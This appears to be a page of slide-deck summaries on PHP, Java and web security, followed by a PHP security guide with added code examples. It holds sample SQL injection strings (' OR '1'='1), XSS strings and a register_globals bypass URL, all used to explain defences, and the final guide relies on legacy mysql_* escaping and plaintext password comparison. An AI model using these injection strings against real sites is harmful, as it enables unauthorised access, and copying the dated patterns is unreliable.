This document discusses security best practices for PHP applications, including sanitizing user input, validating data, preventing SQL injection and cross-site scripting (XSS), storing passwords securely, using cookies safely, and enabling error logging and reporting. It outlines 12 steps such as sanitizing input, validating data types, escaping output, and disabling register_globals. Note that register_globals was removed in PHP 5.4, so that step applies only to legacy installations; the remaining steps still apply on current PHP versions.
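For the password-storage step above, this added example (not code from the summarized document) shows the pattern PHP itself provides: hash with password_hash(), verify with password_verify(), and upgrade weaker stored hashes transparently at login. The cost of 12 and the "legacy" cost-10 hash are assumptions chosen to show the rehash path.

```php
<?php
declare(strict_types=1);

// Added example for the password-storage step: hash with password_hash(), verify
// with password_verify(), and upgrade old hashes transparently at login.
// The cost value 12 is an assumed policy; tune it to your hardware.

const PASSWORD_COST = 12;

function storePassword(string $password): string
{
    // PASSWORD_DEFAULT is bcrypt today and may change in future PHP releases;
    // algorithm, cost and salt are stored inside the hash string, so verification
    // keeps working after a change. Persist the returned string, never the password.
    // bcrypt only looks at the first 72 bytes of input; enforce a length limit on
    // the form rather than silently truncating.
    return password_hash($password, PASSWORD_DEFAULT, ['cost' => PASSWORD_COST]);
}

function checkPassword(string $password, string $storedHash, ?string &$rehash = null): bool
{
    if (!password_verify($password, $storedHash)) {
        return false;
    }
    // If the stored hash uses a weaker algorithm or cost than current policy,
    // hand back a replacement so the caller can update the row while the
    // plaintext is available (the only moment a rehash is possible).
    if (password_needs_rehash($storedHash, PASSWORD_DEFAULT, ['cost' => PASSWORD_COST])) {
        $rehash = password_hash($password, PASSWORD_DEFAULT, ['cost' => PASSWORD_COST]);
    }
    return true;
}

// Constructed data: a hash produced earlier with a lower cost than current policy.
$legacyHash = password_hash('correct horse battery staple', PASSWORD_BCRYPT, ['cost' => 10]);

$rehash = null;
$ok = checkPassword('correct horse battery staple', $legacyHash, $rehash);
var_dump($ok);                                   // verification against the old hash
var_dump($rehash !== null);                      // a cost-12 replacement was produced
var_dump(checkPassword('wrong password', $legacyHash));
```

Never compare hashes yourself with == or ===; password_verify() does the constant-time comparison and understands every format password_hash() has ever emitted.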
PHP strings store and manipulate text. A string is a sequence of bytes of any length, limited only by available memory, and can be written with single quotes, double quotes, heredoc or nowdoc syntax. Double-quoted strings and heredocs process escape sequences such as \n and \t and interpolate variables, so a literal double quote, backslash or dollar sign inside them must be escaped with a backslash; single-quoted strings and nowdocs interpret only \' and \\ and leave everything else, including $, as written. PHP provides many built-in functions for concatenation, comparison, searching, replacing, extracting, splitting, joining, formatting and more. Regular expressions give powerful pattern matching, with functions like preg_match() for searching a string with a regex pattern. Note that the preg_* functions return false (not 0) when matching aborts with an error such as an exceeded backtrack limit, so code that treats any falsy result as "no match" can be pushed into accepting input it never actually checked; compare against 1 explicitly.
PHP is a server-side scripting language used for web development. It allows developers to add dynamic content and functionality to websites. Some key points about PHP from the document:
- PHP code is embedded into HTML and executed on the server to create dynamic web page content. It can be used to connect to databases, process forms, and more.
- PHP has many data types including strings, integers, floats, booleans, arrays, objects, null values and resources. Variables, operators, and conditional statements allow for control flow and data manipulation.
- Common PHP structures include if/else statements for conditional logic, loops like for/while/foreach for iteration, and functions for reusability. Ar
PHP provides built-in connectivity to many databases such as MySQL, PostgreSQL and Oracle. The document describes the legacy mysql extension: a connection is created with mysql_connect() or mysql_pconnect(), the latter a persistent connection that is reused across requests (so transactions, locks and session variables left behind by one request can leak into the next). The high-level process is connecting to the server, selecting a database, sending a SQL query, processing the result set, and closing the connection, using mysql_query() to submit queries, mysql_fetch_array() to retrieve rows and mysql_close() to terminate the connection. The mysql_* functions were deprecated in PHP 5.5 and removed in PHP 7.0, and they offer no parameter binding, so new code should use mysqli or PDO with prepared statements; the procedure above maps one-to-one onto those APIs.
This document discusses HTML forms and how they send data to a server. It explains the GET and POST methods and the PHP superglobals ($_GET, $_POST, $_REQUEST) used to collect that data on the server side. GET appends the fields to the URL as a query string, so the values end up in browser history, server logs and Referer headers and are subject to URL length limits; POST carries the fields in the request body, whose size is bounded only by PHP's post_max_size setting. Neither method is more secure in transit than the other: without TLS both the URL and the body are readable on the wire, so POST is simply the right method for state-changing requests and for data that should not appear in URLs. Both populate the respective superglobal with an array of field name/value pairs. $_REQUEST merges $_GET, $_POST and $_COOKIE in the order set by request_order, so code reading it cannot tell which source a value came from; read from the specific array instead.
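The summary above stops at collecting the fields; the part a practitioner wants is what happens to them next. This added example (not code from the summarized document) validates a constructed stand-in for $_POST with filter_var() and an allow-list regex, returning typed values or per-field errors. The field names and rules are assumptions for illustration.

```php
<?php
declare(strict_types=1);

// Added example: validate form fields collected from a superglobal before use.
// $source is normally $_POST (or $_GET); a constructed array stands in for it
// below so the script runs from the command line.

function validateSignup(array $source): array
{
    $errors = [];
    $clean  = [];

    // Integer in a fixed range. FILTER_VALIDATE_INT rejects "12abc", "7.0" and "0x1A",
    // and returns false (not 0) on failure, so compare with === false.
    $age = filter_var($source['age'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 13, 'max_range' => 120]]);
    if ($age === false) {
        $errors['age'] = 'age must be an integer between 13 and 120';
    } else {
        $clean['age'] = $age; // already an int, no cast needed
    }

    // E-mail syntax check. This validates shape only, not that the mailbox exists.
    $email = filter_var($source['email'] ?? '', FILTER_VALIDATE_EMAIL);
    if ($email === false) {
        $errors['email'] = 'invalid e-mail address';
    } else {
        $clean['email'] = $email;
    }

    // Username: allow-list the character set instead of trying to strip bad characters.
    // The is_string() guard matters because username[]=x arrives as an array.
    $user = $source['username'] ?? '';
    if (!is_string($user) || preg_match('/\A[a-z0-9_]{3,32}\z/', $user) !== 1) {
        $errors['username'] = 'username must be 3-32 lowercase letters, digits or underscores';
    } else {
        $clean['username'] = $user;
    }

    // Optional homepage: require an absolute http(s) URL so a "javascript:" link is never stored.
    if (($source['homepage'] ?? '') !== '') {
        $url = filter_var($source['homepage'], FILTER_VALIDATE_URL);
        $scheme = $url === false ? null : parse_url($url, PHP_URL_SCHEME);
        if ($url === false || !in_array($scheme, ['http', 'https'], true)) {
            $errors['homepage'] = 'homepage must be an http(s) URL';
        } else {
            $clean['homepage'] = $url;
        }
    }

    return ['ok' => $errors === [], 'data' => $clean, 'errors' => $errors];
}

// Constructed sample input standing in for $_POST.
$good = ['age' => '34', 'email' => 'ana@example.org', 'username' => 'ana_42', 'homepage' => 'https://example.org'];
$bad  = ['age' => '34abc', 'email' => 'not-an-address', 'username' => '<script>', 'homepage' => 'javascript:alert(1)'];

print_r(validateSignup($good));
print_r(validateSignup($bad)['errors']);
```

Validation decides whether a value is acceptable at all; it does not replace escaping, which still has to happen at every output point where the value is later used.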
Event handling involves responding to user actions like clicking buttons or typing text. Events are generated by sources like buttons or keyboards and handled by listeners that implement specific event listener interfaces. The listener is registered with the source to receive notifications when events occur, then processes the event by implementing callback methods defined in the listener interface. Common types of events include action events, item events, and mouse events.
This document discusses serialization in .NET. Serialization converts an object graph into a linear sequence of bytes that can be sent over a stream. The document covers basic serialization with attributes, implementing interfaces such as ISerializable for custom serialization, and writing custom formatters. Key points are that types must be marked as serializable, that an object graph includes every object referenced from the root, and that ISerializable and IDeserializationCallback let a type hook into the serialization process. From a security standpoint, the runtime formatters this material is built on (BinaryFormatter and its relatives) are now documented by Microsoft as insecure and deprecated: deserializing untrusted bytes with them lets the sender choose which types get instantiated, so they must never be used on input from outside a trust boundary.
An array is a data structure that stores multiple values in a single variable. There are two main types of arrays in PHP: indexed arrays which use integers as keys and associative arrays which use named keys like strings. The document discusses how to define, access, iterate through and perform operations on arrays in PHP such as counting elements and checking if a key exists.
This document provides information about PHP (Hypertext Preprocessor), including its history, uses, syntax, variables, data types, operators, conditional statements, arrays, loops, functions, and more. Some key points:
- PHP is a widely-used scripting language for building dynamic web pages and applications. It was created in 1995 and runs on web servers.
- PHP code is embedded into HTML files and interpreted by the server before the page is sent to the browser. It allows for the creation of dynamic content.
- PHP is free, runs on most web servers, and provides tools for database connectivity, security and dynamic page creation; the document also argues it compares favourably with competitors such as ASP.
This document provides an introduction and overview of PHP and MySQL. PHP is a programming language used for building dynamic web sites. It allows embedding code within HTML pages to quickly create dynamic content. PHP is processed on the server side to produce HTML results. The document outlines PHP basics like syntax, variables, strings, operators, and conditional statements. It also discusses MySQL, the most popular database used with PHP. The document concludes with exercises for users to practice basic PHP concepts.
This Edureka tutorial on “Java ArrayList” (Java blog series: https://goo.gl/osrGrS) will give you a brief insight about ArrayList in Java and its various constructors and methods along with an example. Through this tutorial, you will learn the following topics:
Collections Framework
Hierarchy of ArrayList
What is ArrayList
Internal Working of ArrayList
Constructors of ArrayList
Constructors Example
ArrayList Methods
Methods Example and Demo
Advantages of ArrayList over Arrays
The document discusses the different types of operators in PHP including arithmetic, assignment, comparison, logical, increment/decrement, and conditional operators. It provides examples of how each operator is used and the output. The key operators covered are addition, subtraction, multiplication, division, modulus, equal, not equal, less than, greater than, logical and, logical or, increment, decrement, and ternary conditional operators.
PHP is a server-side scripting language used to create dynamic web pages. It allows embedding PHP code within HTML pages and interacting with databases. Key elements of PHP include variables, control structures, functions, and sessions. A session keeps user data on the server and hands the browser only a session identifier (normally itself carried in a cookie), so a user can be tracked across pages without exposing the data to the client or trusting the client to preserve it.
+ Background and basics of web application security, the HTTP protocol
+ Web application insecurities, OWASP Top 10 vulnerabilities (XSS, SQL injection, CSRF, etc.)
+ Web application security tools (scanners, fuzzers, etc.), remediation of web application vulnerabilities
+ Web application audits and risk assessment
Web Application Security 101 was conducted by Vaibhav Gupta, Vishal Ashtana and Sandeep Singh from Null.
Cookies and sessions let a server store and retrieve per-user information across page requests that would otherwise be stateless. Cookies store the data in the user's browser, where the user can read and modify it, while sessions keep the data on the server and give the browser only an identifier. Browsers cap the size and number of cookies; session data can hold larger objects. A session cookie with no explicit lifetime is discarded when the browser closes, but the server-side session data persists until PHP's garbage collector removes it after session.gc_maxlifetime, so a stolen identifier can stay valid for longer than the user expects. PHP provides setcookie() and the $_SESSION superglobal to manage cookies and sessions for maintaining state in web applications.
PHP string functions let us manipulate strings in various ways. Several kinds of string function are available; here we discuss some important ones and their use, with examples.
The document is a presentation on HTML5 that covers:
- What HTML5 is and why to use it
- New HTML5 structural elements, forms, multimedia elements, and JavaScript APIs
- Demonstrations of HTML5 features like Canvas, SVG, Geolocation, Web Workers, and Web Sockets
- How CSS3 enhances HTML5 with features like media queries, colors, animations and more
- Strategies for implementing HTML5 into websites while maintaining compatibility
This document discusses the collection framework in Java. It provides an overview of the need for collections due to limitations of arrays. It then describes the key interfaces in the collection framework - Collection, List, Set, SortedSet, NavigableSet, Queue, Map, SortedMap, and NavigableMap. For each interface, it provides a brief description of its purpose and characteristics. It explains that collections allow storing heterogeneous data types with variable sizes, unlike arrays.
This document discusses AJAX (Asynchronous JavaScript and XML). It defines AJAX as a group of interrelated web development techniques used on the client-side to create interactive web applications. AJAX allows web pages to be updated asynchronously by exchanging small amounts of data with the server without reloading the entire page. The document outlines the technologies that power AJAX like HTML, CSS, XML, JavaScript, and XMLHttpRequest and how they work together to enable asynchronous updates on web pages.
CSS is used to style and lay out web pages. It allows separation of document content from page layout and design. CSS declarations are made up of selectors and properties. Selectors identify elements on the page and properties set specific styles for those elements, like color, font, size, and layout. CSS rules cascade based on specificity and source, with more specific and inline rules taking precedence over broader and external rules. Inheritance passes down text-based styles by default.
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016 (Frans Rosén)
Frans Rosén has reported hundreds of security issues using his big white hat since 2012. He has received the biggest bounty ever paid on HackerOne, and is one of the highest-ranked bug bounty researchers of all time. He's been bug bounty hunting with an iPhone in Thailand, in a penthouse suite in Las Vegas and without even being present, using automation. He'll share his stories about how to act when a company's CISO is screaming "SH******T F*CK" in a phone call at 02:30 on a Friday night, what to do when companies are sending him money without any reason and why Doctors without Borders are trying to hunt him down.
The document discusses various PHP array functions including:
- Functions like array_combine(), array_count_values() and array_diff() for building an array from separate key and value arrays, counting how often each value occurs, and comparing arrays.
- Sorting arrays with asort(), arsort(), ksort(), krsort().
- Other functions like array_search(), array_sum(), array_rand() for searching, summing and random values.
- Modifying arrays with array_push(), array_pop(), array_shift() for adding/removing elements.
The document provides examples of using each array function in PHP code snippets.
The document discusses various vulnerabilities in web servers and web applications. It covers popular web servers like IIS, Apache, and others. It then discusses attacking vulnerabilities in web servers like sample files, source code disclosure, canonicalization, and buffer overflows. It also discusses vulnerabilities in web applications like cross-site scripting, SQL injection, cross-site request forgery, and HTTP response splitting. It provides examples of exploits and recommendations for countermeasures to secure web servers and applications.
The document summarizes a training presentation on PHP with MySQL. It begins with an introduction to the Center for Electronic Governance (CEG), which was established in 2006 by the Government of Rajasthan to oversee technical education. The presentation then covers the history of PHP, what PHP is, its features, code syntax, components like variables, operators, arrays and functions. It discusses advantages of PHP like being open source and supporting multiple databases. Finally, it provides an overview of why MySQL is a popular database to use with PHP before describing some basic MySQL queries.
Companion slides for the REST API Security webinar by Stormpath CTO and co-founder Les. The presentation covers the RESTful best practices learned building the Stormpath API and supporting authentication for thousands of projects. Topics include:
- HTTP Authentication
- Choosing a Security Protocol
- Generating & Managing API Keys
- Authorization & Scopes
- Token Authentication with JSON Web Tokens (JWTs)
- Much more...
Stormpath is a User Management API that reduces development time with instant-on, scalable user infrastructure. Stormpath's intuitive API and expert support make it easy for developers to authenticate, manage and secure users and roles in any application.
This document provides an overview of HTTP and REST APIs. It describes how HTTP allows sending documents over the web using URLs to identify resources and HTTP verbs like GET, PUT, DELETE and POST. It defines common response codes. It explains that REST stands for Representational State Transfer and relies on a stateless, client-server architecture using the HTTP protocol. The key design constraints of REST include having a uniform interface, being resource-based and using representations to manipulate resources with self-descriptive messages. Benefits include statelessness for scalability, cacheability to improve performance, separating clients from servers, and using a layered system with intermediary servers.
In this core java training session, you will learn Collections - Maps. Topics covered in this session are:
• Collections – Maps
• Map Interface
• Map methods
• Map use
• Hashmap
• Treemap
• Utilities
For more information about this course visit on this link: https://www.mindsmapped.com/courses/software-development/learn-java-fundamentals-hands-on-training-on-core-java-concepts/
Web application security is an important topic gaining more attention. Sensitive data needs protection not only on servers but also when traveling over networks. Common web application vulnerabilities include cross-site scripting, SQL injection, and cross-site request forgery. Developers should implement measures like encryption, limiting file access and uploads, hiding errors, and using secure sessions to authenticate users. Security requires ongoing consideration to prevent network attacks, unauthorized access, and data theft.
The document provides an overview of basic web security issues and recommendations to address them. It discusses making regular backups and testing restores, using strong and unique passwords that are changed frequently, password protecting directories with .htaccess, keeping software updated, restricting access to sensitive files and data, preventing cross-site scripting attacks, filtering user-submitted data, and using prepared statements to prevent SQL injection. The goal is to increase awareness of common vulnerabilities and how to avoid or lessen exposure to exploits.
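The prepared-statement recommendation above, and the connect/query/fetch procedure described for the legacy mysql extension earlier on this page, as one added example that is not taken from either summarized document. It puts the string-concatenated query beside its PDO replacement and runs both against the same injection string. An in-memory SQLite database is used so it runs without a server; the table, rows and payload are constructed for the demonstration.

```php
<?php
declare(strict_types=1);

// Added example: the string-concatenated query that the removed mysql_* style
// encouraged, beside the PDO prepared statement that replaces it.
// Uses an in-memory SQLite database so it runs without a MySQL server; swap the
// DSN for 'mysql:host=...;dbname=...;charset=utf8mb4' in a real deployment.

$pdo = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION, // fail loudly, never silently
    PDO::ATTR_EMULATE_PREPARES   => false,                  // real server-side binding (matters for MySQL; SQLite always binds natively)
    PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
]);

// Constructed schema and rows for the demonstration.
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)');
$pdo->exec("INSERT INTO users (name, role) VALUES ('alice', 'admin'), ('bob', 'user')");

// Vulnerable: the attacker-controlled value becomes part of the SQL text,
// exactly what mysql_query("... WHERE name = '$name'") used to do.
function findUserUnsafe(PDO $pdo, string $name): array
{
    $sql = "SELECT name, role FROM users WHERE name = '" . $name . "'";
    return $pdo->query($sql)->fetchAll();
}

// Hardened: the statement is compiled first and the value is sent separately,
// so it can only ever be data, never SQL syntax.
function findUserSafe(PDO $pdo, string $name): array
{
    $stmt = $pdo->prepare('SELECT name, role FROM users WHERE name = :name');
    $stmt->execute([':name' => $name]);
    return $stmt->fetchAll();
}

$payload = "x' OR '1'='1";   // constructed injection string

// The WHERE clause becomes  name = 'x' OR '1'='1'  and matches every row.
print_r(findUserUnsafe($pdo, $payload));

// The same bytes are compared literally against the name column; nothing matches.
print_r(findUserSafe($pdo, $payload));
```

Identifiers (table and column names) and keywords such as ORDER BY direction cannot be bound as parameters; if those must vary, map the user's choice onto a fixed allow-list in code rather than interpolating it.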
This document provides an overview of basic web security best practices. It recommends making rolling backups and testing restores, using strong and unique passwords that are changed frequently, password-protecting directories with .htaccess, keeping software updated, filtering user input to prevent XSS and SQL injection, and not displaying sensitive data in publicly accessible areas. It also warns that cookie values are attacker-controlled input that must be validated and escaped like any other (a cookie cannot execute code by itself, but its contents can carry an injection payload into a page or query), and about the risks of iframes.
Top 10 Web Security Vulnerabilities (OWASP Top 10) (Brian Huff)
The document summarizes the top 10 security vulnerabilities in web applications according to the Open Web Application Security Project (OWASP), as listed in the 2010 edition: injection flaws, cross-site scripting, broken authentication and session management, insecure direct object references, cross-site request forgery, security misconfiguration, insecure cryptographic storage, failure to restrict URL access, insufficient transport layer protection, and unvalidated redirects and forwards. Countermeasures for each vulnerability are also provided.
The document discusses common web application security threats like cross-site request forgery (CSRF), cross-site scripting (XSS), and SQL injections. It provides examples of each threat and explains how Joomla handles them, such as by adding tokens for CSRF protection and escaping user input. The document also covers other attacks like direct code access, register globals being on, and outlines best practices for secure web development like input sanitization and validation.
The document discusses security best practices for PHP and MySQL web applications. It covers securing MySQL configurations, using encryption and access privileges appropriately. For PHP, it recommends filtering all external data, considering potential attacks like SQL injection, XSS, session hijacking and code injection. It provides examples of each attack and methods to prevent them, such as prepared statements, output encoding and regenerating session IDs.
12-security.ppt - PHP and Arabic Language - Index, by webhostingguy
The document discusses PHP security best practices. It emphasizes two golden rules: 1) filter all external input and 2) escape all output. It provides examples of filtering user-submitted data and escaping it before displaying or inserting into a database. It also covers common attacks like SQL injection, session fixation, and cross-site scripting, explaining how to prevent them by following the two golden rules of filtering input and escaping output.
The document discusses PHP security best practices. It emphasizes two golden rules: 1) filter all external input and 2) escape all output. It provides examples of filtering user-submitted data and escaping it before displaying to browsers or inserting into databases. It also covers common attacks like SQL injection, session hijacking, and cross-site scripting, explaining how to prevent them by following the two golden rules of filtering input and escaping output.
The document provides an overview of PHP security topics like input validation, SQL injection, cross-site scripting, code injection, and session security. It discusses the importance of validating all user inputs, escaping data when querying databases, using prepared statements to prevent SQL injection, and regenerating session IDs and validating browser signatures to secure sessions. Specific functions and techniques are presented for preventing vulnerabilities in each area.
This document provides eight rules for writing secure PHP programs:
1. Use proper cryptography and do not invent your own algorithms.
2. Validate all input from external sources before using.
3. Sanitize data sent to databases or other systems to prevent injection attacks.
4. Avoid leaking sensitive information through error messages or other means.
5. Properly manage user sessions to prevent hijacking and ensure users remain authenticated.
6. Enforce authentication and authorization separately using least privilege.
7. Use SSL/TLS to encrypt all authenticated or sensitive communications.
8. Keep security straightforward and avoid relying on obscurity.
Security must be balanced with expense and usability. It should be considered from the initial design phase and involve filtering all external data, validating expected data fields, and carefully handling variables to avoid vulnerabilities like register_globals. Key aspects of security include identifying illegitimate uses, educating yourself, filtering data at multiple points, and logging errors for detection while hiding them from users.
The document provides an overview of various PHP security topics including input validation, cross-site scripting, SQL injection, code injection, session security, and concerns regarding shared hosting environments. It discusses best practices for securing PHP applications such as validating all user inputs, using prepared statements, secure session handling, and restricting file system access.
The document provides an overview of PHP security topics like input validation, cross-site scripting, SQL injection, code injection, and session security. It discusses the importance of validating all user inputs, escaping data when querying databases, using prepared statements to prevent SQL injection, avoiding dynamic code inclusion, and securing PHP sessions to prevent session hijacking. Specific techniques like data filtering, escaping special characters, regenerating session IDs, and validating browser signatures are presented.
The document discusses various security issues and best practices for writing secure PHP applications, including:
1. Validating all user inputs, using prepared statements to prevent SQL injection, and disabling register_globals and magic quotes.
2. Properly configuring PHP error messages, file permissions, and directory listings to prevent information disclosure.
3. Using strong hashing with salts to securely store passwords, disabling dangerous PHP functions, preventing XSS and CSRF attacks, and being generally paranoid about security.
This document provides a summary of steps to secure an Apache and PHP server environment. It discusses locking down the server operating system, hardening Apache configurations, securing PHP settings and development practices, and securely configuring common PHP applications like phpMyAdmin and phpNuke. The key recommendations are to turn off unnecessary services, enable logging and monitoring, lock down filesystem permissions, use modules like mod_security and mod_dosevasive to filter requests, follow secure PHP development best practices, and carefully configure applications following security guidelines.
Table Of Content
The OWASP Top Ten
Unvalidated Redirects and Forwards
Security Misconfiguration
Application Fingerprint
Error handling And Logging
Noise
PHP Guidelines
The document discusses various techniques for evading XSS filters, including ModSecurity. It provides examples of how filters like ModSecurity can miss attacks that use encoding, unusual tags, or JavaScript tricks. The filters are shown to be ineffective against attacks that avoid common keywords or use alternative encodings.
The document discusses various cross-site scripting (XSS) attacks and evasion techniques that can bypass common XSS filters like ModSecurity and PHP-IDS. It provides examples of XSS payloads that exploit weaknesses in these filters and evade detection. Recommended defenses include strengthening XSS filters by improving regular expressions and rulesets.
Consequently, PHP applications often end up working with sensitive data.
a. Unauthorized access to this data is unacceptable.
b. To prevent problems, a secure design is needed.
www.mindfiresolutions.com | www.twitter.com/mindfires | http://wikipedia.org/wiki/mindfire_solutions
Basic Steps

1. Input fields must be sanitized before being used

One of the key concepts you must accept is that user input is unreliable and not to be trusted. It may be:
- partially lost in transmission between server and client;
- corrupted by some in-between process;
- modified by a malicious user in an unexpected manner;
- an intentional attempt to gain unauthorized access or to crash the application.

There are many ways to sanitize data. You can use PHP's built-in functions for the purpose or write your own.

Example: all data passed to PHP (GET/POST/COOKIE) arrives as a string (or an array of strings). Using strings where integers are needed is not only inefficient but also dangerous, so convert to the type you expect before using the value:

    if (!empty($_GET['id'])) {
        $id = (int) $_GET['id'];
    } else {
        $id = 0;
    }

PHP also ships with the ctype extension, which offers a very quick mechanism for validating string content.
    if (!ctype_alnum($_GET['login'])) {
        echo "Only A-Za-z0-9 are allowed.";
    }
    if (!ctype_alpha($_GET['captcha'])) {
        echo "Only A-Za-z are allowed.";
    }

You can also write your own customized validation, for example:

    function validateEmail($email) {
        if ($email == "") {
            return false;
        }
        // Requires a local part, an @, a domain with optional dot-separated labels
        // and a top-level domain of at least two letters. filter_var($email,
        // FILTER_VALIDATE_EMAIL) is the built-in alternative to a hand-written pattern.
        if (!preg_match('/^[a-z0-9._%+-]+@[a-z0-9-]+(\.[a-z0-9-]+)*\.[a-z]{2,}$/i', $email)) {
            return false;
        }
        return true;
    }
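The following is an added example, not code from the original deck, that takes the (int) cast and the ctype checks above one step further: it reads typed values (an integer within a range, a value from a fixed list, and an e-mail address) out of a request array without relying on a bare cast, and shows what a bare cast gets wrong. The function names and the constructed $get array are this example's own.

```php
<?php
// Added example (not part of the original deck). Function names are this example's own.
declare(strict_types=1);

/**
 * Read an integer parameter, or return $default if the value is missing, not a plain
 * string, not an integer literal, or outside [$min, $max].
 */
function readInt(array $source, string $key, int $default, int $min, int $max): int
{
    // ?id[]=1 arrives as an array; (int) of an array is 1 with no error, so refuse non-strings.
    if (!isset($source[$key]) || !is_string($source[$key])) {
        return $default;
    }
    // FILTER_VALIDATE_INT accepts only an optionally signed run of digits within the range:
    // "12abc" and "1e3" fail here, whereas (int) "12abc" silently yields 12.
    $value = filter_var($source[$key], FILTER_VALIDATE_INT, [
        'options' => ['min_range' => $min, 'max_range' => $max],
    ]);
    return $value === false ? $default : $value;
}

/**
 * Read a value that must be one of a fixed set of choices (a whitelist). Useful for
 * things that cannot be bound as query parameters, such as an ORDER BY column name.
 */
function readChoice(array $source, string $key, array $allowed, string $default): string
{
    $value = $source[$key] ?? null;
    // strict in_array: "0", "" or true must not match by loose comparison
    return (is_string($value) && in_array($value, $allowed, true)) ? $value : $default;
}

/** Read an e-mail address, or null if missing or malformed. */
function readEmail(array $source, string $key): ?string
{
    $value = $source[$key] ?? null;
    if (!is_string($value) || strlen($value) > 254) {   // 254 is the RFC 5321 path limit
        return null;
    }
    // filter_var implements the address grammar; a hand-written regex is easy to get wrong
    $valid = filter_var($value, FILTER_VALIDATE_EMAIL);
    return $valid === false ? null : $valid;
}

// Constructed request data standing in for $_GET.
$get = [
    'id'    => '12abc',                  // not a pure integer: rejected, falls back to the default
    'page'  => '3',
    'sort'  => 'name); DROP TABLE x;--', // not in the whitelist: falls back to 'created'
    'email' => 'bob@example.com',
    'ids'   => ['1', '2'],               // an array where a scalar was expected: rejected
];

$id    = readInt($get, 'id', 0, 1, PHP_INT_MAX);
$page  = readInt($get, 'page', 1, 1, 1000);
$ids   = readInt($get, 'ids', 0, 1, PHP_INT_MAX);
$sort  = readChoice($get, 'sort', ['name', 'created', 'price'], 'created');
$email = readEmail($get, 'email');

// $sort is guaranteed to be one of the three literals, so it is safe to splice into an
// ORDER BY clause; $id and $page are real ints and can be bound or cast without surprises.
$orderBy = "ORDER BY $sort";
var_dump($id, $page, $ids, $sort, $email, $orderBy);
```

The whitelist function is the one to reach for whenever user input selects something structural (a column, a table, a file name) that a prepared statement cannot parameterize.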
2. Data Validation

There are two types of validation in a web application:
a. client-side validation
b. server-side validation

Client-side validation is not reliable: an attacker can always bypass it or switch off the client-side script routines, for example by disabling JavaScript, or simply submit the request without using a browser at all. Hence server-side validation is a must from the security point of view, even when client-side validation exists.
3. Accessing Input Data

A series of superglobals offers very simple access to the input data: $_GET, $_POST, $_COOKIE, $_SERVER and $_REQUEST. ($_REQUEST merges GET and POST data, and depending on request_order cookie data too, so prefer the specific array when you need to know where a value came from.)

Using GET to send sensitive data is a security problem. When sensitive data is to be passed to the server, do not send it as a parameter in the query string, like in http://sitename/check_valid.php?cardnumber=1234567890123456. The entire URL may be stored by the browser in its history, written to web server and proxy access logs, and leaked to other sites in the Referer header, potentially exposing the sensitive information to someone else.

The POST method carries the data in the HTTP body, which is normally not written to access logs or browser history. POST alone, however, does not offer enough protection: the data's confidentiality and integrity are still at risk because it is still sent in clear text. Encryption in transit is therefore required as well: serve both the form and the page it submits to over HTTPS (SSL/TLS).
4. Escaping Output

Output is anything that leaves your application, bound for a client. The client, in this case, is anything from a web browser to a database server, and just as you should filter all incoming data, you should escape all outbound data. Whereas filtering input protects your application from bad or harmful data, escaping output protects the client and user from potentially damaging commands.

To escape output intended for a web browser, PHP provides htmlspecialchars() and htmlentities(). Example:

    $_POST['data'] = "<script>alert('Security issues');</script>";
    $var = $_POST['data'];
    if (get_magic_quotes_gpc()) {      // magic quotes only exist in PHP before 5.4
        $var = stripslashes($var);
    }
    // ENT_QUOTES also escapes single quotes, so the value is safe inside quoted
    // attributes too; always pass the charset the page is served in.
    echo htmlentities($var, ENT_QUOTES, 'UTF-8');
5. Register Globals

The register_globals directive is disabled by default in PHP 4.2.0 and later (and was removed altogether in PHP 5.4.0). Turning it on is a security risk, so always develop and deploy applications with register_globals disabled.

Why is it a security risk? Consider the following block of code:

    <?php
    if (authenticated_user()) {
        $authorized = true;
    }
    if ($authorized) {
        include '/highly/sensitive/data.php';
    }
    ?>

Since $authorized is left uninitialized when user authentication fails, with register_globals on an attacker could access the privileged data simply by passing the value via GET:

http://example.com/script.php?authorized=1

Solutions:
- Disable register_globals in php.ini (already the default as of PHP 4.2.0).
- Code with error_reporting set to E_ALL, which shows warnings about the use of uninitialized variables, so such a variable will not be overlooked during development.
- Initialize all variables: here, set $authorized to false before the authentication check, so that any injected value is overwritten.
- Use type-sensitive validation conditions: because input is always a string, a strict comparison against a boolean or an integer will never match injected input.
6. Error Reporting

During development, turning error reporting fully on is good practice:

    ini_set('error_reporting', E_ALL);

However, when you put your site into production, this level of detail can be dangerous. You can't foresee all errors during development; your program could run out of memory or disk space, for example. So, for safety's sake, on production sites disable the display of errors and instead log them to a file outside your document root; this way the public can't see when something goes wrong, while you still can.

    error_reporting(E_ALL ^ E_NOTICE);            // a 'sensible' reporting level
    ini_set('display_errors', 0);                 // hide all error messages from the public
    ini_set('log_errors', 1);
    ini_set('error_log', 'path/to_your/log.txt'); // preferably a location outside your web root
7. SQL Injection

SQL injection refers to someone getting SQL of their own run on your database without your knowledge. It usually occurs when you ask a user for input, like their name, and instead of a name they supply SQL fragments that you unknowingly concatenate into a query and run.

One of the most common vulnerable spots is the login form. Take this example:

    $username = $_POST['username'];
    $password = $_POST['password'];
    $result = mysql_query("
        SELECT * FROM site_users
        WHERE username = '$username' AND password = '$password'
    ");
    if (mysql_num_rows($result) > 0) {
        // logged in
    }
If the attacker enters a valid username, "rob", in the username field and the following in the password field:

    ' OR '1'='1

the resulting query will look like this:

    SELECT * FROM site_users WHERE username = 'rob' AND password = '' OR '1'='1'

Since the last condition is always true (and OR binds more loosely than AND), the query returns every row, mysql_num_rows() is greater than zero, and the login check passes without the attacker knowing rob's password.

Preventing SQL injection: the robust fix is to stop building queries by string concatenation and use prepared statements with bound parameters (mysqli or PDO), so that user data can never change the structure of the query. If you must keep the legacy mysql extension (deprecated in PHP 5.5 and removed in PHP 7), every value interpolated into a query has to go through mysql_real_escape_string(), which escapes characters such as ' and ", and you must check whether magic quotes are on to avoid double escaping.
    function check_sql_injection($var) {
        if (get_magic_quotes_gpc()) {
            $var = stripslashes($var);
        }
        $var = mysql_real_escape_string($var);   // needs an open mysql connection
        return $var;
    }

This function is applied in PHP to each value before the value is placed inside the quotes of the SQL string (it cannot be called from within the SQL text itself):

    $username = check_sql_injection($_POST['username']);
    $password = check_sql_injection($_POST['password']);
    $result = mysql_query("
        SELECT * FROM site_users
        WHERE username = '$username' AND password = '$password'
    ");

